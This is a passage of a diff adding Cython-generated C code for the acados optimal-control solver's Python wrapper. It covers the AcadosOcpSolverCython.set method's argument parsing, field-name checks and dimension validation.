__pyx_n_s_field_2)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 492, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("set", 1, 3, 3, 1); __PYX_ERR(0, 492, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 2: + if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_value)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 492, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("set", 1, 3, 3, 2); __PYX_ERR(0, 492, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "set") < 0)) __PYX_ERR(0, 492, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 3)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + } + __pyx_v_stage = __Pyx_PyInt_As_int(values[0]); if (unlikely((__pyx_v_stage == (int)-1) && PyErr_Occurred())) __PYX_ERR(0, 492, __pyx_L3_error) + __pyx_v_field_ = ((PyObject*)values[1]); + __pyx_v_value_ = values[2]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("set", 1, 3, 3, __pyx_nargs); __PYX_ERR(0, 492, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.set", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + if (unlikely(!__Pyx_ArgTypeTest(((PyObject *)__pyx_v_field_), (&PyUnicode_Type), 1, "field_", 1))) __PYX_ERR(0, 492, __pyx_L1_error) + __pyx_r = __pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_34set(((struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *)__pyx_v_self), __pyx_v_stage, __pyx_v_field_, __pyx_v_value_); + + /* function exit code */ + goto __pyx_L0; + __pyx_L1_error:; + __pyx_r = NULL; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_34set(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, int __pyx_v_stage, PyObject *__pyx_v_field_, PyObject *__pyx_v_value_) { + PyObject *__pyx_v_cost_fields = NULL; + PyObject *__pyx_v_constraints_fields = NULL; + PyObject *__pyx_v_out_fields = NULL; + PyObject *__pyx_v_mem_fields = NULL; + PyObject *__pyx_v_field = NULL; + PyArrayObject *__pyx_v_value = 0; + PyObject *__pyx_v_dims = NULL; + PyObject *__pyx_v_msg = NULL; + __Pyx_LocalBuf_ND __pyx_pybuffernd_value; + __Pyx_Buffer __pyx_pybuffer_value; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + PyObject *__pyx_t_5 = NULL; + PyArrayObject *__pyx_t_6 = NULL; + int __pyx_t_7; + char *__pyx_t_8; + npy_intp *__pyx_t_9; + int __pyx_t_10; + char const *__pyx_t_11; + char const *__pyx_t_12; + char const *__pyx_t_13; + char const *__pyx_t_14; + char const *__pyx_t_15; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("set", 0); + __pyx_pybuffer_value.pybuffer.buf = NULL; + __pyx_pybuffer_value.refcount = 0; + __pyx_pybuffernd_value.data = NULL; + __pyx_pybuffernd_value.rcbuffer = &__pyx_pybuffer_value; + + /* "acados_template/acados_ocp_solver_pyx.pyx":511 + * su: slack variables of soft upper inequality constraints \n + * """ + * cost_fields = ['y_ref', 'yref'] # <<<<<<<<<<<<<< + * constraints_fields = ['lbx', 'ubx', 'lbu', 'ubu'] + * out_fields = ['x', 'u', 'pi', 'lam', 't', 'z', 'sl', 'su'] + */ + __pyx_t_1 = PyList_New(2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 511, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(__pyx_n_u_y_ref); + __Pyx_GIVEREF(__pyx_n_u_y_ref); + PyList_SET_ITEM(__pyx_t_1, 0, __pyx_n_u_y_ref); + __Pyx_INCREF(__pyx_n_u_yref); + __Pyx_GIVEREF(__pyx_n_u_yref); + PyList_SET_ITEM(__pyx_t_1, 1, __pyx_n_u_yref); + __pyx_v_cost_fields = ((PyObject*)__pyx_t_1); + __pyx_t_1 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":512 + * """ + * cost_fields = ['y_ref', 'yref'] + * constraints_fields = ['lbx', 'ubx', 'lbu', 'ubu'] # <<<<<<<<<<<<<< + * out_fields = ['x', 'u', 'pi', 'lam', 't', 'z', 'sl', 'su'] + * mem_fields = ['xdot_guess', 'z_guess'] + */ + __pyx_t_1 = PyList_New(4); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 512, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(__pyx_n_u_lbx); + __Pyx_GIVEREF(__pyx_n_u_lbx); + PyList_SET_ITEM(__pyx_t_1, 0, __pyx_n_u_lbx); + __Pyx_INCREF(__pyx_n_u_ubx); + __Pyx_GIVEREF(__pyx_n_u_ubx); + PyList_SET_ITEM(__pyx_t_1, 1, __pyx_n_u_ubx); + __Pyx_INCREF(__pyx_n_u_lbu); + __Pyx_GIVEREF(__pyx_n_u_lbu); + PyList_SET_ITEM(__pyx_t_1, 2, __pyx_n_u_lbu); + __Pyx_INCREF(__pyx_n_u_ubu); + __Pyx_GIVEREF(__pyx_n_u_ubu); + PyList_SET_ITEM(__pyx_t_1, 3, __pyx_n_u_ubu); + __pyx_v_constraints_fields = ((PyObject*)__pyx_t_1); + __pyx_t_1 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":513 + * cost_fields = ['y_ref', 'yref'] + * constraints_fields = ['lbx', 'ubx', 'lbu', 'ubu'] + * out_fields = ['x', 'u', 'pi', 'lam', 't', 'z', 'sl', 'su'] # <<<<<<<<<<<<<< + * mem_fields = ['xdot_guess', 'z_guess'] + * + */ + __pyx_t_1 = PyList_New(8); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 513, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(__pyx_n_u_x); + __Pyx_GIVEREF(__pyx_n_u_x); + PyList_SET_ITEM(__pyx_t_1, 0, __pyx_n_u_x); + __Pyx_INCREF(__pyx_n_u_u); + __Pyx_GIVEREF(__pyx_n_u_u); + PyList_SET_ITEM(__pyx_t_1, 1, __pyx_n_u_u); + __Pyx_INCREF(__pyx_n_u_pi); + __Pyx_GIVEREF(__pyx_n_u_pi); + PyList_SET_ITEM(__pyx_t_1, 2, __pyx_n_u_pi); + __Pyx_INCREF(__pyx_n_u_lam); + __Pyx_GIVEREF(__pyx_n_u_lam); + PyList_SET_ITEM(__pyx_t_1, 3, __pyx_n_u_lam); + __Pyx_INCREF(__pyx_n_u_t); + __Pyx_GIVEREF(__pyx_n_u_t); + PyList_SET_ITEM(__pyx_t_1, 4, __pyx_n_u_t); + __Pyx_INCREF(__pyx_n_u_z); + __Pyx_GIVEREF(__pyx_n_u_z); + PyList_SET_ITEM(__pyx_t_1, 5, __pyx_n_u_z); + __Pyx_INCREF(__pyx_n_u_sl); + __Pyx_GIVEREF(__pyx_n_u_sl); + PyList_SET_ITEM(__pyx_t_1, 6, __pyx_n_u_sl); + __Pyx_INCREF(__pyx_n_u_su); + __Pyx_GIVEREF(__pyx_n_u_su); + PyList_SET_ITEM(__pyx_t_1, 7, __pyx_n_u_su); + __pyx_v_out_fields = ((PyObject*)__pyx_t_1); + __pyx_t_1 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":514 + * constraints_fields = ['lbx', 'ubx', 'lbu', 'ubu'] + * out_fields = ['x', 'u', 'pi', 'lam', 't', 'z', 'sl', 'su'] + * mem_fields = ['xdot_guess', 'z_guess'] # <<<<<<<<<<<<<< + * + * field = field_.encode('utf-8') + */ + __pyx_t_1 = PyList_New(2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 514, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(__pyx_n_u_xdot_guess); + __Pyx_GIVEREF(__pyx_n_u_xdot_guess); + PyList_SET_ITEM(__pyx_t_1, 0, __pyx_n_u_xdot_guess); + __Pyx_INCREF(__pyx_n_u_z_guess); + __Pyx_GIVEREF(__pyx_n_u_z_guess); + PyList_SET_ITEM(__pyx_t_1, 1, __pyx_n_u_z_guess); + __pyx_v_mem_fields = ((PyObject*)__pyx_t_1); + __pyx_t_1 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":516 + * mem_fields = ['xdot_guess', 'z_guess'] + * + * field = field_.encode('utf-8') # <<<<<<<<<<<<<< + * + * cdef cnp.ndarray[cnp.float64_t, ndim=1] value = np.ascontiguousarray(value_, dtype=np.float64) + */ + if (unlikely(__pyx_v_field_ == Py_None)) { + PyErr_Format(PyExc_AttributeError, "'NoneType' object has no attribute '%.30s'", "encode"); + __PYX_ERR(0, 516, __pyx_L1_error) + } + __pyx_t_1 = PyUnicode_AsUTF8String(__pyx_v_field_); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 516, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_v_field = __pyx_t_1; + __pyx_t_1 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":518 + * field = field_.encode('utf-8') + * + * cdef cnp.ndarray[cnp.float64_t, ndim=1] value = np.ascontiguousarray(value_, dtype=np.float64) # <<<<<<<<<<<<<< + * + * # treat parameters separately + */ + __Pyx_GetModuleGlobalName(__pyx_t_1, __pyx_n_s_np); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 518, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __Pyx_PyObject_GetAttrStr(__pyx_t_1, __pyx_n_s_ascontiguousarray); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 518, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = PyTuple_New(1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 518, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(__pyx_v_value_); + __Pyx_GIVEREF(__pyx_v_value_); + PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_v_value_); + __pyx_t_3 = __Pyx_PyDict_NewPresized(1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 518, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_GetModuleGlobalName(__pyx_t_4, __pyx_n_s_np); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 518, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_5 = __Pyx_PyObject_GetAttrStr(__pyx_t_4, __pyx_n_s_float64); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 518, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + if (PyDict_SetItem(__pyx_t_3, __pyx_n_s_dtype, __pyx_t_5) < 0) __PYX_ERR(0, 518, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __pyx_t_5 = __Pyx_PyObject_Call(__pyx_t_2, __pyx_t_1, __pyx_t_3); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 518, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + if (!(likely(((__pyx_t_5) == Py_None) || likely(__Pyx_TypeTest(__pyx_t_5, __pyx_ptype_5numpy_ndarray))))) __PYX_ERR(0, 518, __pyx_L1_error) + __pyx_t_6 = ((PyArrayObject *)__pyx_t_5); + { + __Pyx_BufFmt_StackElem __pyx_stack[1]; + if (unlikely(__Pyx_GetBufferAndValidate(&__pyx_pybuffernd_value.rcbuffer->pybuffer, (PyObject*)__pyx_t_6, &__Pyx_TypeInfo_nn___pyx_t_5numpy_float64_t, PyBUF_FORMAT| PyBUF_STRIDES, 1, 0, __pyx_stack) == -1)) { + __pyx_v_value = ((PyArrayObject *)Py_None); __Pyx_INCREF(Py_None); __pyx_pybuffernd_value.rcbuffer->pybuffer.buf = NULL; + __PYX_ERR(0, 518, __pyx_L1_error) + } else {__pyx_pybuffernd_value.diminfo[0].strides = __pyx_pybuffernd_value.rcbuffer->pybuffer.strides[0]; __pyx_pybuffernd_value.diminfo[0].shape = __pyx_pybuffernd_value.rcbuffer->pybuffer.shape[0]; + } + } + __pyx_t_6 = 0; + __pyx_v_value = ((PyArrayObject *)__pyx_t_5); + __pyx_t_5 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":521 + * + * # treat parameters separately + * if field_ == 'p': # <<<<<<<<<<<<<< + * assert acados_solver.acados_update_params(self.capsule, stage, value.data, value.shape[0]) == 0 + * else: + */ + __pyx_t_7 = (__Pyx_PyUnicode_Equals(__pyx_v_field_, __pyx_n_u_p, Py_EQ)); if (unlikely((__pyx_t_7 < 0))) __PYX_ERR(0, 521, __pyx_L1_error) + if (__pyx_t_7) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":522 + * # treat parameters separately + * if field_ == 'p': + * assert acados_solver.acados_update_params(self.capsule, stage, value.data, value.shape[0]) == 0 # <<<<<<<<<<<<<< + * else: + * if field_ not in constraints_fields + cost_fields + out_fields: + */ + #ifndef CYTHON_WITHOUT_ASSERTIONS + if (unlikely(__pyx_assertions_enabled())) { + __pyx_t_8 = __pyx_f_5numpy_7ndarray_4data_data(((PyArrayObject *)__pyx_v_value)); if (unlikely(__pyx_t_8 == ((char *)NULL) && PyErr_Occurred())) __PYX_ERR(0, 522, __pyx_L1_error) + __pyx_t_9 = __pyx_f_5numpy_7ndarray_5shape_shape(((PyArrayObject *)__pyx_v_value)); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 522, __pyx_L1_error) + __pyx_t_7 = (lat_acados_update_params(__pyx_v_self->capsule, __pyx_v_stage, ((double *)__pyx_t_8), (__pyx_t_9[0])) == 0); + if (unlikely(!__pyx_t_7)) { + __Pyx_Raise(__pyx_builtin_AssertionError, 0, 0, 0); + __PYX_ERR(0, 522, __pyx_L1_error) + } + } + #else + if ((1)); else __PYX_ERR(0, 522, __pyx_L1_error) + #endif + + /* "acados_template/acados_ocp_solver_pyx.pyx":521 + * + * # treat parameters separately + * if field_ == 'p': # <<<<<<<<<<<<<< + * assert acados_solver.acados_update_params(self.capsule, stage, value.data, value.shape[0]) == 0 + * else: + */ + goto __pyx_L3; + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":524 + * assert acados_solver.acados_update_params(self.capsule, stage, value.data, value.shape[0]) == 0 + * else: + * if field_ not in constraints_fields + cost_fields + out_fields: # <<<<<<<<<<<<<< + * raise Exception("AcadosOcpSolverCython.set(): {} is not a valid argument.\ + * \nPossible values are {}. Exiting.".format(field, \ + */ + /*else*/ { + __pyx_t_5 = PyNumber_Add(__pyx_v_constraints_fields, __pyx_v_cost_fields); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 524, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_3 = PyNumber_Add(__pyx_t_5, __pyx_v_out_fields); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 524, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __pyx_t_7 = (__Pyx_PySequence_ContainsTF(__pyx_v_field_, __pyx_t_3, Py_NE)); if (unlikely((__pyx_t_7 < 0))) __PYX_ERR(0, 524, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + if (unlikely(__pyx_t_7)) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":526 + * if field_ not in constraints_fields + cost_fields + out_fields: + * raise Exception("AcadosOcpSolverCython.set(): {} is not a valid argument.\ + * \nPossible values are {}. Exiting.".format(field, \ # <<<<<<<<<<<<<< + * constraints_fields + cost_fields + out_fields + ['p'])) + * + */ + __pyx_t_5 = __Pyx_PyObject_GetAttrStr(__pyx_kp_u_AcadosOcpSolverCython_set_is_not, __pyx_n_s_format); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 526, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + + /* "acados_template/acados_ocp_solver_pyx.pyx":527 + * raise Exception("AcadosOcpSolverCython.set(): {} is not a valid argument.\ + * \nPossible values are {}. Exiting.".format(field, \ + * constraints_fields + cost_fields + out_fields + ['p'])) # <<<<<<<<<<<<<< + * + * dims = acados_solver_common.ocp_nlp_dims_get_from_attr(self.nlp_config, + */ + __pyx_t_1 = PyNumber_Add(__pyx_v_constraints_fields, __pyx_v_cost_fields); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 527, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = PyNumber_Add(__pyx_t_1, __pyx_v_out_fields); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 527, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = PyList_New(1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 527, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(__pyx_n_u_p); + __Pyx_GIVEREF(__pyx_n_u_p); + PyList_SET_ITEM(__pyx_t_1, 0, __pyx_n_u_p); + __pyx_t_4 = PyNumber_Add(__pyx_t_2, __pyx_t_1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 527, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = NULL; + __pyx_t_10 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_5))) { + __pyx_t_1 = PyMethod_GET_SELF(__pyx_t_5); + if (likely(__pyx_t_1)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_5); + __Pyx_INCREF(__pyx_t_1); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_5, function); + __pyx_t_10 = 1; + } + } + { + PyObject *__pyx_callargs[3] = {__pyx_t_1, __pyx_v_field, __pyx_t_4}; + __pyx_t_3 = __Pyx_PyObject_FastCall(__pyx_t_5, __pyx_callargs+1-__pyx_t_10, 2+__pyx_t_10); + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 526, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":525 + * else: + * if field_ not in constraints_fields + cost_fields + out_fields: + * raise Exception("AcadosOcpSolverCython.set(): {} is not a valid argument.\ # <<<<<<<<<<<<<< + * \nPossible values are {}. Exiting.".format(field, \ + * constraints_fields + cost_fields + out_fields + ['p'])) + */ + __pyx_t_5 = __Pyx_PyObject_CallOneArg(((PyObject *)(&((PyTypeObject*)PyExc_Exception)[0])), __pyx_t_3); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 525, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_Raise(__pyx_t_5, 0, 0, 0); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __PYX_ERR(0, 525, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":524 + * assert acados_solver.acados_update_params(self.capsule, stage, value.data, value.shape[0]) == 0 + * else: + * if field_ not in constraints_fields + cost_fields + out_fields: # <<<<<<<<<<<<<< + * raise Exception("AcadosOcpSolverCython.set(): {} is not a valid argument.\ + * \nPossible values are {}. Exiting.".format(field, \ + */ + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":530 + * + * dims = acados_solver_common.ocp_nlp_dims_get_from_attr(self.nlp_config, + * self.nlp_dims, self.nlp_out, stage, field) # <<<<<<<<<<<<<< + * + * if value_.shape[0] != dims: + */ + __pyx_t_11 = __Pyx_PyObject_AsString(__pyx_v_field); if (unlikely((!__pyx_t_11) && PyErr_Occurred())) __PYX_ERR(0, 530, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":529 + * constraints_fields + cost_fields + out_fields + ['p'])) + * + * dims = acados_solver_common.ocp_nlp_dims_get_from_attr(self.nlp_config, # <<<<<<<<<<<<<< + * self.nlp_dims, self.nlp_out, stage, field) + * + */ + __pyx_t_5 = __Pyx_PyInt_From_int(ocp_nlp_dims_get_from_attr(__pyx_v_self->nlp_config, __pyx_v_self->nlp_dims, __pyx_v_self->nlp_out, __pyx_v_stage, __pyx_t_11)); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 529, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_v_dims = __pyx_t_5; + __pyx_t_5 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":532 + * self.nlp_dims, self.nlp_out, stage, field) + * + * if value_.shape[0] != dims: # <<<<<<<<<<<<<< + * msg = 'AcadosOcpSolverCython.set(): mismatching dimension for field "{}" '.format(field_) + * msg += 'with dimension {} (you have {})'.format(dims, value_.shape[0]) + */ + __pyx_t_5 = __Pyx_PyObject_GetAttrStr(__pyx_v_value_, __pyx_n_s_shape); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 532, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_3 = __Pyx_GetItemInt(__pyx_t_5, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 532, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __pyx_t_5 = PyObject_RichCompare(__pyx_t_3, __pyx_v_dims, Py_NE); __Pyx_XGOTREF(__pyx_t_5); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 532, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_t_7 = __Pyx_PyObject_IsTrue(__pyx_t_5); if (unlikely((__pyx_t_7 < 0))) __PYX_ERR(0, 532, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + if (unlikely(__pyx_t_7)) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":533 + * + * if value_.shape[0] != dims: + * msg = 'AcadosOcpSolverCython.set(): mismatching dimension for field "{}" '.format(field_) # <<<<<<<<<<<<<< + * msg += 'with dimension {} (you have {})'.format(dims, value_.shape[0]) + * raise Exception(msg) + */ + __pyx_t_3 = __Pyx_PyObject_GetAttrStr(__pyx_kp_u_AcadosOcpSolverCython_set_mismat, __pyx_n_s_format); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 533, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_4 = NULL; + __pyx_t_10 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_3))) { + __pyx_t_4 = PyMethod_GET_SELF(__pyx_t_3); + if (likely(__pyx_t_4)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); + __Pyx_INCREF(__pyx_t_4); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_3, function); + __pyx_t_10 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_4, __pyx_v_field_}; + __pyx_t_5 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_10, 1+__pyx_t_10); + __Pyx_XDECREF(__pyx_t_4); __pyx_t_4 = 0; + if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 533, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + } + __pyx_v_msg = __pyx_t_5; + __pyx_t_5 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":534 + * if value_.shape[0] != dims: + * msg = 'AcadosOcpSolverCython.set(): mismatching dimension for field "{}" '.format(field_) + * msg += 'with dimension {} (you have {})'.format(dims, value_.shape[0]) # <<<<<<<<<<<<<< + * raise Exception(msg) + * + */ + __pyx_t_3 = __Pyx_PyObject_GetAttrStr(__pyx_kp_u_with_dimension_you_have, __pyx_n_s_format); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 534, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_4 = __Pyx_PyObject_GetAttrStr(__pyx_v_value_, __pyx_n_s_shape); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 534, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_1 = __Pyx_GetItemInt(__pyx_t_4, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 534, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __pyx_t_4 = NULL; + __pyx_t_10 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_3))) { + __pyx_t_4 = PyMethod_GET_SELF(__pyx_t_3); + if (likely(__pyx_t_4)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); + __Pyx_INCREF(__pyx_t_4); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_3, function); + __pyx_t_10 = 1; + } + } + { + PyObject *__pyx_callargs[3] = {__pyx_t_4, __pyx_v_dims, __pyx_t_1}; + __pyx_t_5 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_10, 2+__pyx_t_10); + __Pyx_XDECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 534, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + } + __pyx_t_3 = PyNumber_InPlaceAdd(__pyx_v_msg, __pyx_t_5); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 534, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_DECREF_SET(__pyx_v_msg, __pyx_t_3); + __pyx_t_3 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":535 + * msg = 'AcadosOcpSolverCython.set(): mismatching dimension for field "{}" '.format(field_) + * msg += 'with dimension {} (you have {})'.format(dims, value_.shape[0]) + * raise Exception(msg) # <<<<<<<<<<<<<< + * + * if field_ in constraints_fields: + */ + __pyx_t_3 = __Pyx_PyObject_CallOneArg(((PyObject *)(&((PyTypeObject*)PyExc_Exception)[0])), __pyx_v_msg); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 535, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_Raise(__pyx_t_3, 0, 0, 0); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __PYX_ERR(0, 535, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":532 + * self.nlp_dims, self.nlp_out, stage, field) + * + * if value_.shape[0] != dims: # <<<<<<<<<<<<<< + * msg = 'AcadosOcpSolverCython.set(): mismatching dimension for field "{}" '.format(field_) + * msg += 'with dimension {} (you have {})'.format(dims, value_.shape[0]) + */ + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":537 + * raise Exception(msg) + * + * if field_ in constraints_fields: # <<<<<<<<<<<<<< + * acados_solver_common.ocp_nlp_constraints_model_set(self.nlp_config, + * self.nlp_dims, self.nlp_in, stage, field, value.data) + */ + __pyx_t_7 = (__Pyx_PySequence_ContainsTF(__pyx_v_field_, __pyx_v_constraints_fields, Py_EQ)); if (unlikely((__pyx_t_7 < 0))) __PYX_ERR(0, 537, __pyx_L1_error) + if (__pyx_t_7) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":539 + * if field_ in constraints_fields: + * acados_solver_common.ocp_nlp_constraints_model_set(self.nlp_config, + * self.nlp_dims, self.nlp_in, stage, field, value.data) # <<<<<<<<<<<<<< + * elif field_ in cost_fields: + * acados_solver_common.ocp_nlp_cost_model_set(self.nlp_config, 